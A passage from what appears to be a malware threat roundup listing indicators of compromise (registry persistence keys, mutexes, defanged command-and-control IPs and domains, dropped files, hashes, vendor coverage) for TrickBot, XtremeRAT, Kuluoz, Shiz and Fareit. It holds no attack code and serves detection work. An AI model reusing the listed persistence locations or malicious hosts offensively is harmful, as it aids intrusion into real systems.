<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{7E6AEF51-F5A7-48A0-B175-FE26B30A3B42} 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{7E6AEF51-F5A7-48A0-B175-FE26B30A3B42}\SHELLFOLDER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{39D7DE2A-54FC-2744-D7AC-675623A7BCA2} 25
Mutexes Occurrences
{24d07012-9955-711c-e323-1079ebcbe1f4} 25
{bf18992f-6351-a1bd-1f80-485116c997cd} 25
{dbad1190-816b-947c-9b01-53ef739d7edb} 25
{ed099f6b-73d9-00a3-4493-daef482dc5ca} 20
Files and or directories created Occurrences
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 25
%System32%\Tasks\Ryddmbivo 25
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 25
%System32%\8452\eudcedit.exe 1
%APPDATA%\F9NSFA\MRT.exe 1
%APPDATA%\EoXbu\BdeUISrv.exe 1
%System32%\9450\VSSVC.exe 1
%System32%\7744\ComputerDefaults.exe 1
%APPDATA%\RAQ9\calc.exe 1
%System32%\9936\psr.exe 1
%APPDATA%\Q7e9\rekeywiz.exe 1
%System32%\5094\WindowsAnytimeUpgrade.exe 1
%APPDATA%\U6yhd\DeviceDisplayObjectProvider.exe 1
%System32%\5022\msra.exe 1
%APPDATA%\EtXM\fvenotify.exe 1
%System32%\1402\ddodiag.exe 1
%APPDATA%\bsPEU\wbengine.exe 1
%System32%\6726\StikyNot.exe 1
%APPDATA%\Kal6bb\sethc.exe 1
%System32%\6787\ie4uinit.exe 1
%APPDATA%\Y74EoZ\Dxpserver.exe 1
%System32%\7651\rrinstaller.exe 1
%APPDATA%\aF7U\WerFault.exe 1
%System32%\6604\DeviceDisplayObjectProvider.exe 1
%APPDATA%\rmluRRx\MRT.exe 1
*See JSON for more IOCs

File Hashes

0be6c8c9f6626f0cbc875a04f81d65ec51646285f607fc23610ced0698d2d356 0e00806596a0084133b662804d645e485a94d42b50e7634608bfc572bc6f99bc 10d50610dc069e961878c8d2be79f7ba638125c2f0229086f27d2261f7ef7074 209494092b65fdebe368f90fdf69cd878f931fb334c059611ccabe84301887e2 24273a46f41c978ebd1b7014cd43c05d7273e638fa539e21adf9b16fcd6d7fa4 270234993c0381d55e1d5615099a692a0e11139d6d5b353f625ac6197cc5fadd 2ce15b1bfa8a577f79da8bbcf2159bf3661aed963cdbbb59ddbf333da4bb52ea 370de40215ce6a4e8f27e33d7a6edcd9cc4c86dc39aa86246d02308f556ff39e 5239bbf6672c93344f21741c4016ea154db5f6aa3989514244de6c55532f54d4 5341a8e7076ea8dbba28ed69ec1130f361c7e90505afbb191f639d6b8295a3e7 634295ad711f68679e6471766d8ca49454c7276348211b6d99a5539e314e7ddb 64c51179f273e00dcb08ddf0c401a3e7c6b4441421f4a0f907bc32f4aaf54191 65c0c35adfcd488cde26d72ba39dd77052f0d6f54c40d10003d824ce1079a630 670db2f68e0bb350f98d1f0ea9624e45536473bb9f1552270be89d87aba17ed9 77c9d7eb923718013ec2145d35a18f17b326655e226b6f252ca6967b0837b39a 8ded5e3631dcd94576d1770289b38005c95c1456588157fd01ea6191c7bcaf1a 91c351ad5a31c40ccf05069b4dde6d0d8e2ff7e78118ca4d110bfe8fcef7d5b6 96e1d30dda3746847269a2707bf4261deadf3d146d1e9df5bd163743ef6b0902 9cebaa66b09ae6043e137c87fece4f2f55a3ae9cbbbb64414e0202a6d3db8932 9d019b660a52484961f7d540d3fe62da22c2c09be968474a614f9dd94ae8c7e5 a2074b34223a80ea0a46784e03ab9e09f86deb98c470c10b2999692fe19777b3 a81460aa2b31719c28672cc624c8fd83e3cbde9d4fc59fb1c55a0713b22a031b a8e2070710eb026f8d9aa46032576b1d474171ea11bb6d2cff97cc9e2069a3af ae65c3182b13c9012b1fc98d483a3c1c7bfd82193d1cd14b1e2a0572458530b1 ae8b637375e736db787d31a4081f2f39ce25908f3276807e43a6eceb4e511377
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.TrickBot-9970890-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000
2
Mutexes Occurrences
Global\VLock 3
Global\683173c1-3af4-11ed-9660-001517635527 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
104[.]18[.]115[.]97 2
91[.]83[.]88[.]51 1
92[.]63[.]102[.]64 1
195[.]133[.]144[.]237 1
34[.]160[.]111[.]145 1
195[.]133[.]196[.]130 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
obyavlenie[.]lisx[.]ru 10
icanhazip[.]com 2
ipecho[.]net 1
Files and or directories created Occurrences
%APPDATA%\winapp\Modules 3
%System32%\Tasks\services update 3
%APPDATA%\winapp\client_id 3
%APPDATA%\winapp\group_tag 3
%APPDATA%\winapp 3
%APPDATA%\winapp\24ae736c30cacc5f26f34e07c47ca97c.exe 1
%APPDATA%\winapp\0g5d59dff6a3d3g20046c0ga554f8f9ef8d3e2c767g46c2592d53d6c604df5g9.exe 1
%APPDATA%\winapp\39g7366fcac6cdd0a64ag077e5ga30354aggg87d682e9cd06940033777cefaf2.exe 1

File Hashes

0a9fd6d744cc4fa8e08eee7c95c58d6cb9cb995a249597bdc8beba4ab5fdd921 0f4c49cee6a2c2f10036b0fa443e8e9de8c2d1b757f36b1491c42c6b503ce4f9 14bf94de8b881459e2f6f49051b1411da60e3526251751048bdde18f99d93f1e 29f7266ebab5bcc0a53af077d4fa20243afff87c681d9bc06930022777bdeae1 42162ca740023f144cf1f5efc8f9680f5db0ac16e0cf9eeb88f57275a5bbd38e 489d8e1c47548164a35abb21dbe155972aa09e6c65c0fd7456baf79d3ffb3539 7820f15d39888555e5d2189015d13491d58e2c345921064777155febcaf9b88e 8c1326a8e1f6c781441f3a5da6fe962337a03b9a3ffd93495e933e051d24f4a0 eac3e3c5636e62a6865ff6e048875506d16ed22ffd8caca23529407eb94a2478 f3395ab28c54a61118784d205926e7122ff7735d92d992c22db9dd63fd3a8e28

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.XtremeRAT-9971238-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 16
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
Value Name: InstalledServer
16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKLM
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKCU
15
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
Value Name: ServerStarted
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{T88RCWLO-A2V2-4LXR-TJ24-W4CWO446W6OJ} 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{T88RCWLO-A2V2-4LXR-TJ24-W4CWO446W6OJ}
Value Name: StubPath
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{424A7MGK-RCMT-8C4V-40EM-XW7BLA8PVRC7} 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{424A7MGK-RCMT-8C4V-40EM-XW7BLA8PVRC7}
Value Name: StubPath
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5K3TI7P5-LW5S-LR18-4174-DG7KKUL703V7} 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5K3TI7P5-LW5S-LR18-4174-DG7KKUL703V7}
Value Name: StubPath
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2} 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2}
Value Name: StubPath
2
Mutexes Occurrences
XTREMEUPDATE 16
<random, matching [a-zA-Z0-9]{5,9}EXIT> 15
<random, matching [a-zA-Z0-9]{5,9}>PERSIST 11
<random, matching [a-zA-Z0-9]{5,9}> 6
zZgdeZ8P 5
Q6gWX0 5
Q6gWX0PERSIST 5
Global\<random guid> 4
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
profesorjedi11[.]myftp[.]biz 10
profesorjedi3[.]myftp[.]biz 3
clarityz[.]no-ip[.]biz 2
dynamic[.]no-ip[.]biz 2
cooempresas1[.]ddns[.]net 1
Files and or directories created Occurrences
%TEMP%\x.html 15
%SystemRoot%\SysWOW64\System32 10
%APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.dat 6
%APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.cfg 6
%SystemRoot%\SysWOW64\Sistem32 5
%APPDATA%\Microsoft\Windows\zZgdeZ8P.cfg 5
%SystemRoot%\SysWOW64\System32\crrsc.exe 5
%APPDATA%\Microsoft\Windows\zZgdeZ8P.dat 5
%APPDATA%\Microsoft\Windows\Q6gWX0.cfg 5
%SystemRoot%\SysWOW64\Sistem32\crrsc.exe 5
%APPDATA%\Microsoft\Windows\Q6gWX0.dat 5
%SystemRoot%\SysWOW64\System32\csrrs.exe 3
%SystemRoot%\SysWOW64\System32\csrss.exe 2
%SystemRoot%\SysWOW64\Drivers\System.exe 1

File Hashes

02bbfb5be9238a07f4bbc310640558187fffe927b6c61aef277f25e556b42976 034fd97c565ab91825e7d810d5e629f00bb25f54ac1ed7f1846e7f1c23d1ecd2 104a08c153d9d099bad368fc405a2888a153bfaa1cf33f99f43fbc1b97d0282f 1a7fa38a87b8d63bdef718b54626476dd952673e010877eb0412041a227ae587 1b70089136743505bd03a024ed1d6faca2a618397aecf14eceafed7e708c42ef 1d281e8cd1c5e451d069a2df9eed854f4bfa28e91881e7e2bfea2be0cfd6e2d0 2a4841ab8656fedadeb5dcc16821ca4789ba29a1df607c72f73fe6de8c55f965 4a5a09ce229c5f06f96114b0c55b1b2a645b75ab6e5f1f3df524efc9e6b549df 4e960f7a51969cc989219642701cb327e7713462eff60866099fb16632e1c636 521f339fe84053ddc608a8f1faf2774ea1f6fa1ee3ad252f642967f27c2ebb2e 52f4aba104b5caadff9baa7eb92e4ff21c176ff183a59f0283555de081e74c9a 53743558915afca3fcf12a83095ed8448502c37ac0ce847268bd34ff2b17eaef 54d8e6f9d64d480ad1381ddcd730d786be7b94b34154fa9ae6a46fc06670732a 58432dc37d6e18bf7f719c42d1a955374dc04c737ec433384fa61ea7c895ce8a 5f0a9ba0fc1146512ec06df04fb3eedcaaf67df5534d2895bdee7d39dbb767d4 6aeceda58114f30d5286bf84e92bfc293d5fb1ed4648c29d9e6ba6e229ad6c0a 73711c78caf84f57df3e54a7e0d47dc5b91c73d521e6e5de2da31694c7a2cd1d 747ae8b9f401e6f92381039c80d98f2fbff9f1c94ab1479c23e9bd67714208b5 7d56d2784dafc2edb6f002e66504b3222f899712167f5d67878e576adf5bfff4 87365c8be5e1df23024d4f06108ca715ca6960fab1db19241af01dc249049b34 95774b16ad3920dee24ad1211ad677003bace3db07e351dcfa92ea8c9fb0de4d 9811dc1790865ba850a085b86faf45d12e6d18de3746fba1f79e7d5bc07b81e6 9fc0af5f00d92876795d06cadc1ec27ce789be7d4396cca1a4d39c10a1a13cee cf6bf580a1c08b6d4c8e4b73c65a156dd87e6157b358a22f58e6c4e741a62088 d2dd951900f73760709d95358434a8d382363f78cbd78a4476e361225b2fdb90
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Kuluoz-9971090-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 26
<HKCU>\SOFTWARE\HLUAPPSN
Value Name: simfbhec
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fihacxpj
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: rtvamnqd
1
<HKCU>\SOFTWARE\UTLRUTMU
Value Name: jqusubuo
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: kilanrco
1
<HKCU>\SOFTWARE\AUBBBWXT
Value Name: ibmqpuls
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: opoiitvt
1
<HKCU>\SOFTWARE\BWCRDATG
Value Name: qmiabusl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mwxoukfx
1
<HKCU>\SOFTWARE\BTTXALDX
Value Name: micawbbp
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: jtqieuec
1
<HKCU>\SOFTWARE\BBWAIJEJ
Value Name: lmpebxqp
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: emgsvrci
1
<HKCU>\SOFTWARE\MNSVSFDT
Value Name: jkxkagel
1
<HKCU>\SOFTWARE\MBJFFRTQ
Value Name: bgmxnfso
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: akpgniqk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hrcgucbt
1
<HKCU>\SOFTWARE\NTKIGTHP
Value Name: etduinsg
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: pjecpkuu
1
<HKCU>\SOFTWARE\NHSATHPS
Value Name: mxopsxdc
1
<HKCU>\SOFTWARE\HPEDSDSE
Value Name: vfkeebww
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: icccipkm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ilxotnrg
1
<HKCU>\SOFTWARE\AFTNNBRU
Value Name: kchufmmw
1
Mutexes Occurrences
aaAdministrator 26
abAdministrator 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
69[.]64[.]36[.]244 21
16[.]156[.]201[.]237 17
110[.]77[.]220[.]66 15
5[.]249[.]139[.]132 15
85[.]12[.]29[.]251 13
5[.]175[.]166[.]35 13
130[.]60[.]202[.]71 11
198[.]57[.]165[.]46 10
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 26

File Hashes

01e772c69c3d96d7da41baf1b4630a9b93cda39bd4b5b0234f1de2a818788965 0507e74fa55bfb2a725358b0e5d2a3ad82d95a15b8dda89eda0892276855c6e0 0575881e5f371494a9b928ea409bce3fc15b35f4a6fc47f5b3ccc267e6428d05 13830d13f9538029311649ec0b7d2b70afd36d0d38432550c973123429eb940b 14b22ef72fd4f36063c344d7358e32d9529010b303b09bcc11f562bf2d4981a7 1f226936fa8a2ae6ff457619b2883377cbe741decadc705095d4527a7ae9a4d8 21f96423b4b10c910ef1ae4f584ed1e49944f2166c41aac0d9f53ad042933f89 25c31d64ed3db07f502aee95703ec407b34dff5a3fdc34bf2b3b64250f2ec0e2 3578e19cbb128d0b2b7fb009c8041deed69144c0e20e6c58c18967a2abcc0c1b 422f405e2d70ed3bd58f6e9c4ef7d1a4ed8b912fc8acde5cab9068f34fc55f09 46b398648a6f022657c1a7a6bf0dae147562f354b34fa9b82103d8566b01c771 4cc31dc0d33247799cb383ede808dea70ab9081847e46b2ce95e2c054cd97011 576ed58a06ae914ae06a711af19b30a9f02ece2d435f84b7bea71fedc19dd995 5bad5333dcfea5b33727b34cde45b54d36cbf01d3fb0a1a915de8df1569b4fb1 5e3329e3193099fe8e09922ac85a7ab3e8ae89f0ae4f0f7a93fb30aacc7726e3 5e398a7762fe420158605cfb72bc309197c7c9346fc43a5cc8ccb0a14db25483 66b43dd194bf97f705c361ad1cc82a0f5c1afca7b03d57f99a3011cdefdc536f 6da9fe76f563ff6265b8971b601fb5037a93011fb16294b5ee7564f332d554ed 6ed6b8dececdaf3ee4ce0072d309125c5cef6e3ffef23f48baa3b0d3763462be 7c42e9ea360ccfb28b41c3490b305dcace56fea64e858ac3cde0984f6c9f3d07 816c6679de23475fe46588ce4380091c985ad689210fbf4daea6ca383f423465 8379ba1a2904b162411009fbe1bc4c94efd1ccf72ab38989dffb2077c1a0ec74 86e574bcb8a28b933731a83f9166c23c717a9840dfdecffde9130e9a2d598e08 8e39459d72319dc5e7f184b363ac8d7e3a486fbc6e02f9ad2273d0b0502a188d 8e5f994ccd02d59bc203efd3ff130575c4d9c170599592dd45696b87c4f4b420
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Shiz-9971537-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 27 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: ProxyEnable
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
Value Name: UNCAsIntranet
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
Value Name: AutoDetect
27
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
27
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159\SHELL
Value Name: KnownFolderDerivedFolderType
1
Mutexes Occurrences
Global\674972E3a 27
Global\MicrosoftSysenterGate7 27
internal_wutex_0x<random, matching [0-9a-f]{8}> 27
internal_wutex_0x000004b4 26
internal_wutex_0x0000043c 26
internal_wutex_0x000004dc 25
internal_wutex_0x000000e0 1
internal_wutex_0x0000038c 1
internal_wutex_0x00000448 1
internal_wutex_0x000006a0 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
204[.]79[.]197[.]200 15
13[.]107[.]21[.]200 12
45[.]33[.]23[.]183 8
173[.]255[.]194[.]134 6
72[.]14[.]178[.]174 6
72[.]14[.]185[.]43 6
45[.]56[.]79[.]23 5
45[.]33[.]2[.]79 5
45[.]33[.]30[.]197 5
45[.]33[.]18[.]44 4
45[.]79[.]19[.]196 3
198[.]58[.]118[.]167 3
85[.]94[.]194[.]169 2
96[.]126[.]123[.]244 1
45[.]33[.]20[.]235 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
kevopoxecun[.]eu 27
rycaropynar[.]eu 27
lyxemoxyquf[.]eu 27
puzoxyvojyc[.]eu 27
fotaqizymig[.]eu 27
cidufitojex[.]eu 27
puvacigakog[.]eu 27
xuboninogyt[.]eu 27
cicezomaxyz[.]eu 27
dixyjohevon[.]eu 27
fokisohurif[.]eu 27
volugomymet[.]eu 27
maganomojer[.]eu 27
jefecajazif[.]eu 27
qedylaqecel[.]eu 27
nojotomipel[.]eu 27
gahoqohofib[.]eu 27
rytifaquwer[.]eu 27
kepujajynib[.]eu 27
lyrosajupid[.]eu 27
tuwaraqidek[.]eu 27
pumebeqalew[.]eu 27
cinycekecid[.]eu 27
divulewybek[.]eu 27
vocijekyqiv[.]eu 27
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 27
%TEMP%\F1A0.tmp 1
%TEMP%\8350.tmp 1
%TEMP%\6709.tmp 1
%TEMP%\5ABC.tmp 1
%TEMP%\DF95.tmp 1

File Hashes

03ceb23a35bcd7170f8e2293c15aa444406959d789fda9ff9e412cf7a3a6ad90 0a00f10084231e3abf745b456d522c27a284cd17e5824a91026e6511a0073792 0a9d1eec9b14e840863b4948703b4c1a50b8d1c16d6cd6c0191ed55e82864ea3 0aa380118e812371de65b56f760676f611ddda8a7dd422ed1e62214c2a8303d1 0b38f48ffc49f1b53724384bd894702bcf49f2d68c1b84e4e0eeb931d572d294 0b8cfcf3c71b18b73ec50c68115b5d7538eab4d21168272d547e4b6316ed592a 0d8afb797e2ce9f712f3b5fb22317ec97cd8ea55b85855ffb33f362f45e3b706 10d952070cca8a50175e4193e23e798484f215faa6ac8261b37caebb4ae4c22a 16487b9aabc544819f3e1843e196d8e6b982b15ae95b9b599af310c0f4a0763e 1751820a0b3e9669c512077ef08caa8cc8bd7cba8bb54eb97c574ba6dfa09d2d 1bafc4ef3a634e29c71f52e5b0f3ea6ab3cd55e25ef9623d8d21302a13ac4833 21c50af5ea57cf75b6bcf6e74b8008b335a440d4f4fd8499d2abc287116a0100 2473d34831b6fef2e985c045c3a00880d05aceeeac10edf1f09ff38a1cbc44af 2602a1096a4eec7291145b4570c1a0e814c03fba18d3d76d1b82f6e0dacaecf8 2656072242b6777473e258b7f0fc7777cda688fe95f0050f375ffeb12f000c28 2856afa65f2c7f0a23be68ce6899f24a9d3e12fa4f3b00644562e1ecdc06eed1 28b92d2ad7b6c9865a5eda3ca5435cbcd7b24fd0b48ed61c9c7b87af542b88ed 29bc8c64d83b59592ced9e79fd8e242344fedaa9bff3d385ce5372de7e035b4b 2a812fc2558cfe90756a59a8d79ec8da9e14d7fec59cd9bbc5189a67a86629eb 2e7fe1b9448cb0cca242f4b72fd956f21ad262587b88135045bc07a010cec102 3047c7b03f084dc15ddbca4044a0fb2376af8b3799e4316194de8ef1474e1bf8 321f58c68fead768a8465532821b62ec741482135b0a5460d48838433cde6133 32b2f95694db2d96de89e4f8644cbdf68229903053c066499141b323d4acca1a 34beb6169472ea58264460d2673a70128474e9bdb62fe998e5c22f9a4fa61a8c 350596b9f1a539dddfd73cb4d10c605ec8cc8ed227bd2f33f31fddd6f190e7d8
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Fareit-9971247-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\WINRAR 13
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
13
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
168[.]144[.]38[.]105 13

File Hashes

